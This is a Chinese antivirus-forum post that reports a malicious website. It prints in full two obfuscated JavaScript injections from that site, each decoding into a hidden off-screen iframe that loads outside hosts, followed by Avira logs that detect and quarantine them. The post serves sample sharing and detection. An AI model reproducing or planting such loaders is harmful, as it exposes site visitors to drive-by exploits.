查看: 1135|回复: 0
收起左侧

[已鉴定] http://magmaestudio.com/tag/resources

[复制链接]
fireold
发表于 2013-11-6 18:40:09 | 显示全部楼层 |阅读模式
  1. /*74ed9f*/
  2. fdlbb = "y";
  3. nyhq = "d" + "o" + "c" + "u" + "ment";
  4. try {
  5.     +
  6.     function() {
  7.         if (document.querySelector)++(window[nyhq].body) == null
  8.     }()
  9. } catch (dvxifi) {
  10.     iglwx = function(vlyr) {
  11.         vlyr = "fr" + "omCh" + vlyr;
  12.         for (ytvln = 0; ytvln < fdlbb.length; ytvln++) {
  13.             hpxxqv += String[vlyr](dzicoj(hyml + (fdlbb[ytvln])) - (56));
  14.         }
  15.     };
  16. };
  17. dzicoj = (window.eval);
  18. hyml = "0x";
  19. chvq = 0;
  20. try {;
  21. } catch (tuq) {
  22.     chvq = 1
  23. }
  24. if (!chvq) {
  25.     try {
  26.         ++dzicoj(nyhq)["\x62o" + "d" + fdlbb]
  27.     } catch (dvxifi) {
  28.         qmv = "^";
  29.     }
  30.     fdlbb = "58^9e^ad^a6^9b^ac^a1^a7^a6^58^a2^a1^ad^a4^68^71^60^61^58^b3^45^42^58^ae^99^aa^58^ab^ac^99^ac^a1^9b^75^5f^99^a2^99^b0^5f^73^45^42^58^ae^99^aa^58^9b^a7^a6^ac^aa^a7^a4^a4^9d^aa^75^5f^a1^a6^9c^9d^b0^66^a8^a0^a8^5f^73^45^42^58^ae^99^aa^58^a2^a1^ad^a4^58^75^58^9c^a7^9b^ad^a5^9d^a6^ac^66^9b^aa^9d^99^ac^9d^7d^a4^9d^a5^9d^a6^ac^60^5f^a1^9e^aa^99^a5^9d^5f^61^73^45^42^45^42^58^a2^a1^ad^a4^66^ab^aa^9b^58^75^58^5f^a0^ac^ac^a8^72^67^67^69^69^71^66^6a^6c^6d^66^69^6d^68^66^69^70^70^67^b2^6b^aa^a6^a0^af^6f^7f^66^a8^a0^a8^5f^73^45^42^58^a2^a1^ad^a4^66^ab^ac^b1^a4^9d^66^a8^a7^ab^a1^ac^a1^a7^a6^58^75^58^5f^99^9a^ab^a7^a4^ad^ac^9d^5f^73^45^42^58^a2^a1^ad^a4^66^ab^ac^b1^a4^9d^66^9b^a7^a4^a7^aa^58^75^58^5f^6d^6d^71^70^6f^5f^73^45^42^58^a2^a1^ad^a4^66^ab^ac^b1^a4^9d^66^a0^9d^a1^9f^a0^ac^58^75^58^5f^6d^6d^71^70^6f^a8^b0^5f^73^45^42^58^a2^a1^ad^a4^66^ab^ac^b1^a4^9d^66^af^a1^9c^ac^a0^58^75^58^5f^6d^6d^71^70^6f^a8^b0^5f^73^45^42^58^a2^a1^ad^a4^66^ab^ac^b1^a4^9d^66^a4^9d^9e^ac^58^75^58^5f^69^68^68^68^6d^6d^71^70^6f^5f^73^45^42^58^a2^a1^ad^a4^66^ab^ac^b1^a4^9d^66^ac^a7^a8^58^75^58^5f^69^68^68^68^6d^6d^71^70^6f^5f^73^45^42^45^42^58^a1^9e^58^60^59^9c^a7^9b^ad^a5^9d^a6^ac^66^9f^9d^ac^7d^a4^9d^a5^9d^a6^ac^7a^b1^81^9c^60^5f^a2^a1^ad^a4^5f^61^61^58^b3^45^42^58^9c^a7^9b^ad^a5^9d^a6^ac^66^af^aa^a1^ac^9d^60^5f^74^a8^58^a1^9c^75^94^5f^a2^a1^ad^a4^94^5f^58^9b^a4^99^ab^ab^75^94^5f^a2^a1^ad^a4^68^71^94^5f^58^76^74^67^a8^76^5f^61^73^45^42^58^9c^a7^9b^ad^a5^9d^a6^ac^66^9f^9d^ac^7d^a4^9d^a5^9d^a6^ac^7a^b1^81^9c^60^5f^a2^a1^ad^a4^5f^61^66^99^a8^a8^9d^a6^9c^7b^a0^a1^a4^9c^60^a2^a1^ad^a4^61^73^45^42^58^b5^45^42^b5^45^42^9e^ad^a6^9b^ac^a1^a7^a6^58^8b^9d^ac^7b^a7^a7^a3^a1^9d^60^9b^a7^a7^a3^a1^9d^86^99^a5^9d^64^9b^a7^a7^a3^a1^9d^8e^99^a4^ad^9d^64^a6^7c^99^b1^ab^64^a8^99^ac^a0^61^58^b3^45^42^58^ae^99^aa^58^ac^a7^9c^99^b1^58^75^58^a6^9d^af^58^7c^99^ac^9d^60^61^73^45^42^58^ae^99^aa^58^9d^b0^a8^a1^aa^9d^58^75^58^a6^9d^af^58^7c^99^ac^9d^60^61^73^45^42^58^a1^9e^58^60^a6^7c^99^b1^ab^75^75^a6^ad^a4^a4^58^b4^b4^58^a6^7c^99^b1^ab^75^75^68^61^58^a6^7c^99^b1^ab^75^69^73^45^42^58^9d^b0^a8^a1^aa^9d^66^ab^9d^ac^8c^a1^a5^9d^60^ac^a7^9c^99^b1^66^9f^9d^ac^8c^a1^a5^9d^60^61^58^63^58^6b^6e^68^68^68^68^68^62^6a^6c^62^a6^7c^99^b1^ab^61^73^45^42^58^9c^a7^9b^ad^a5^9d^a6^ac^66^9b^a7^a7^a3^a1^9d^58^75^58^9b^a7^a7^a3^a1^9d^86^99^a5^9d^63^5a^75^5a^63^9d^ab^9b^99^a8^9d^60^9b^a7^a7^a3^a1^9d^8e^99^a4^ad^9d^61^45^42^58^63^58^5a^73^9d^b0^a8^a1^aa^9d^ab^75^5a^58^63^58^9d^b0^a8^a1^aa^9d^66^ac^a7^7f^85^8c^8b^ac^aa^a1^a6^9f^60^61^58^63^58^60^60^a8^99^ac^a0^61^58^77^58^5a^73^58^a8^99^ac^a0^75^5a^58^63^58^a8^99^ac^a0^58^72^58^5a^5a^61^73^45^42^b5^45^42^9e^ad^a6^9b^ac^a1^a7^a6^58^7f^9d^ac^7b^a7^a7^a3^a1^9d^60^58^a6^99^a5^9d^58^61^58^b3^45^42^58^ae^99^aa^58^ab^ac^99^aa^ac^58^75^58^9c^a7^9b^ad^a5^9d^a6^ac^66^9b^a7^a7^a3^a1^9d^66^a1^a6^9c^9d^b0^87^9e^60^58^a6^99^a5^9d^58^63^58^5a^75^5a^58^61^73^45^42^58^ae^99^aa^58^a4^9d^a6^58^75^58^ab^ac^99^aa^ac^58^63^58^a6^99^a5^9d^66^a4^9d^a6^9f^ac^a0^58^63^58^69^73^45^42^58^a1^9e^58^60^58^60^58^59^ab^ac^99^aa^ac^58^61^58^5e^5e^45^42^58^60^58^a6^99^a5^9d^58^59^75^58^9c^a7^9b^ad^a5^9d^a6^ac^66^9b^a7^a7^a3^a1^9d^66^ab^ad^9a^ab^ac^aa^a1^a6^9f^60^58^68^64^58^a6^99^a5^9d^66^a4^9d^a6^9f^ac^a0^58^61^58^61^58^61^45^42^58^b3^45^42^58^aa^9d^ac^ad^aa^a6^58^a6^ad^a4^a4^73^45^42^58^b5^45^42^58^a1^9e^58^60^58^ab^ac^99^aa^ac^58^75^75^58^65^69^58^61^58^aa^9d^ac^ad^aa^a6^58^a6^ad^a4^a4^73^45^42^58^ae^99^aa^58^9d^a6^9c^58^75^58^9c^a7^9b^ad^a5^9d^a6^ac^66^9b^a7^a7^a3^a1^9d^66^a1^a6^9c^9d^b0^87^9e^60^58^5a^73^5a^64^58^a4^9d^a6^58^61^73^45^42^58^a1^9e^58^60^58^9d^a6^9c^58^75^75^58^65^69^58^61^58^9d^a6^9c^58^75^58^9c^a7^9b^ad^a5^9d^a6^ac^66^9b^a7^a7^a3^a1^9d^66^a4^9d^a6^9f^ac^a0^73^45^42^58^aa^9d^ac^ad^aa^a6^58^ad^a6^9d^ab^9b^99^a8^9d^60^58^9c^a7^9b^ad^a5^9d^a6^ac^66^9b^a7^a7^a3^a1^9d^66^ab^ad^9a^ab^ac^aa^a1^a6^9f^60^58^a4^9d^a6^64^58^9d^a6^9c^58^61^58^61^73^45^42^b5^45^42^a1^9e^58^60^a6^99^ae^a1^9f^99^ac^a7^aa^66^9b^a7^a7^a3^a1^9d^7d^a6^99^9a^a4^9d^9c^61^45^42^b3^45^42^a1^9e^60^7f^9d^ac^7b^a7^a7^a3^a1^9d^60^5f^ae^a1^ab^a1^ac^9d^9c^97^ad^a9^5f^61^75^75^6d^6d^61^b3^b5^9d^a4^ab^9d^b3^8b^9d^ac^7b^a7^a7^a3^a1^9d^60^5f^ae^a1^ab^a1^ac^9d^9c^97^ad^a9^5f^64^58^5f^6d^6d^5f^64^58^5f^69^5f^64^58^5f^67^5f^61^73^45^42^45^42^a2^a1^ad^a4^68^71^60^61^73^45^42^b5^45^42^b5".split(qmv);
  31.     hpxxqv = "";
  32.     iglwx("arCode");
  33.     dzicoj("" + hpxxqv);
  34. } /*/74ed9f*/

  35. /*a9a007*/
  36. wlpbvc = "spl" + "i" + "t";
  37. dybfke = window;
  38. yztdf = "0" + "x";
  39. rmr = (5 - 3 - 1);
  40. try {
  41.     --(document["body"])
  42. } catch (bhrgcn) {
  43.     vlzz = false;
  44.     try {} catch (gce) {
  45.         vlzz = 21;
  46.     }
  47.     if (1) {
  48.         ljavul = "17:5d:6c:65:5a:6b:60:66:65:17:69:68:66:6e:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:69:68:66:6e:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:69:68:66:6e:25:6a:69:5a:17:34:17:1e:5f:6b:6b:67:31:26:26:58:67:63:5a:5c:5d:58:63:6c:25:5a:66:64:26:5a:66:6c:65:6b:5c:69:25:67:5f:67:1e:32:4:1:17:69:68:66:6e:25:6a:6b:70:63:5c:25:67:66:6a:60:6b:60:66:65:17:34:17:1e:58:59:6a:66:63:6c:6b:5c:1e:32:4:1:17:69:68:66:6e:25:6a:6b:70:63:5c:25:5a:66:63:66:69:17:34:17:1e:2f:1e:32:4:1:17:69:68:66:6e:25:6a:6b:70:63:5c:25:5f:5c:60:5e:5f:6b:17:34:17:1e:2f:67:6f:1e:32:4:1:17:69:68:66:6e:25:6a:6b:70:63:5c:25:6e:60:5b:6b:5f:17:34:17:1e:2f:67:6f:1e:32:4:1:17:69:68:66:6e:25:6a:6b:70:63:5c:25:63:5c:5d:6b:17:34:17:1e:28:27:27:27:2f:1e:32:4:1:17:69:68:66:6e:25:6a:6b:70:63:5c:25:6b:66:67:17:34:17:1e:28:27:27:27:2f:1e:32:4:1:4:1:17:60:5d:17:1f:18:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:69:68:66:6e:1e:20:20:17:72:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:6e:69:60:6b:5c:1f:1e:33:67:17:60:5b:34:53:1e:69:68:66:6e:53:1e:17:5a:63:58:6a:6a:34:53:1e:69:68:66:6e:27:30:53:1e:17:35:33:26:67:35:1e:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:69:68:66:6e:1e:20:25:58:67:67:5c:65:5b:3a:5f:60:63:5b:1f:69:68:66:6e:20:32:4:1:17:74:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:4a:5c:6b:3a:66:66:62:60:5c:1f:5a:66:66:62:60:5c:45:58:64:5c:23:5a:66:66:62:60:5c:4d:58:63:6c:5c:23:65:3b:58:70:6a:23:67:58:6b:5f:20:17:72:4:1:17:6d:58:69:17:6b:66:5b:58:70:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:6d:58:69:17:5c:6f:67:60:69:5c:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:60:5d:17:1f:65:3b:58:70:6a:34:34:65:6c:63:63:17:73:73:17:65:3b:58:70:6a:34:34:27:20:17:65:3b:58:70:6a:34:28:32:4:1:17:5c:6f:67:60:69:5c:25:6a:5c:6b:4b:60:64:5c:1f:6b:66:5b:58:70:25:5e:5c:6b:4b:60:64:5c:1f:20:17:22:17:2a:2d:27:27:27:27:27:21:29:2b:21:65:3b:58:70:6a:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:17:34:17:5a:66:66:62:60:5c:45:58:64:5c:22:19:34:19:22:5c:6a:5a:58:67:5c:1f:5a:66:66:62:60:5c:4d:58:63:6c:5c:20:4:1:17:22:17:19:32:5c:6f:67:60:69:5c:6a:34:19:17:22:17:5c:6f:67:60:69:5c:25:6b:66:3e:44:4b:4a:6b:69:60:65:5e:1f:20:17:22:17:1f:1f:67:58:6b:5f:20:17:36:17:19:32:17:67:58:6b:5f:34:19:17:22:17:67:58:6b:5f:17:31:17:19:19:20:32:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:3e:5c:6b:3a:66:66:62:60:5c:1f:17:65:58:64:5c:17:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:69:6b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:65:58:64:5c:17:22:17:19:34:19:17:20:32:4:1:17:6d:58:69:17:63:5c:65:17:34:17:6a:6b:58:69:6b:17:22:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:22:17:28:32:4:1:17:60:5d:17:1f:17:1f:17:18:6a:6b:58:69:6b:17:20:17:1d:1d:4:1:17:1f:17:65:58:64:5c:17:18:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:27:23:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:20:17:20:17:20:4:1:17:72:4:1:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:74:4:1:17:60:5d:17:1f:17:6a:6b:58:69:6b:17:34:34:17:24:28:17:20:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:6d:58:69:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:19:32:19:23:17:63:5c:65:17:20:32:4:1:17:60:5d:17:1f:17:5c:65:5b:17:34:34:17:24:28:17:20:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:63:5c:65:5e:6b:5f:32:4:1:17:69:5c:6b:6c:69:65:17:6c:65:5c:6a:5a:58:67:5c:1f:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:63:5c:65:23:17:5c:65:5b:17:20:17:20:32:4:1:74:4:1:60:5d:17:1f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:69:68:66:6e:27:30:1f:20:32:4:1:74:4:1:74" [wlpbvc](":");
  49.     }
  50.     dybfke = ljavul;
  51.     atyz = [];
  52.     for (tvpe = 22 - 20 - 2; - tvpe + 1396 != 0; tvpe += 1) {
  53.         glud = tvpe;
  54.         if ((0x19 == 031)) atyz += String.fromCharCode(eval(yztdf + dybfke[1 * glud]) + 0xa - rmr);
  55.     }
  56.     ttlmco = eval;
  57.     ttlmco(atyz)
  58. } /*/a9a007*/
复制代码



Avira
2013/11/6 下午 06:34 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\A6GBLLHM\resources[1].htm'
      包含病毒或有害的程式 'EXP/JS.Expack.GQ' [exploit]
      已採取動作:
      發生錯誤,檔案未刪除。錯誤識別碼:26003.
      檔案無法刪除!.
      嘗試使用 ARK 程式庫執行動作。.
      檔案會移動至 '1ffdc0aa.qua' 名稱底下的隔離區目錄。.

2013/11/6 下午 06:34 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數:        814
      目錄數:        0
      惡意程式碼數:        2
      警告數:        0

2013/11/6 下午 06:34 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\INV2BTG1\jqueryba3a[1].js'
      包含病毒或有害的程式 'EXP/JS.Expack.GQ' [exploit]
      已採取動作:
      檔案會移動至 '5537b871.qua' 名稱底下的隔離區目錄。.

2013/11/6 下午 06:32 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\INV2BTG1\jqueryba3a[1].js 中
      偵測到病毒或有害的程式 'EXP/JS.Expack.GQ [exploit]'
      執行的動作:傳輸至掃描程式

2013/11/6 下午 06:32 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\INV2BTG1\jqueryba3a[1].js 中
      偵測到病毒或有害的程式 'EXP/JS.Expack.GQ [exploit]'
      執行的動作:拒絕存取

2013/11/6 下午 06:32 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\A6GBLLHM\resources[1].htm 中
      偵測到病毒或有害的程式 'EXP/JS.Expack.GQ [exploit]'
      執行的動作:傳輸至掃描程式

2013/11/6 下午 06:32 [Web Protection] 已停用 Web Protection
      服務已停用

2013/11/6 下午 06:32 [Web Protection] 封鎖的網頁
      URL (http://magmaestudio.com/tag/resources) 的評估結果為 惡意程式碼,而遭到封鎖。


av.jpg


fs is
fs.jpg
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-4 14:00 , Processed in 0.133999 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表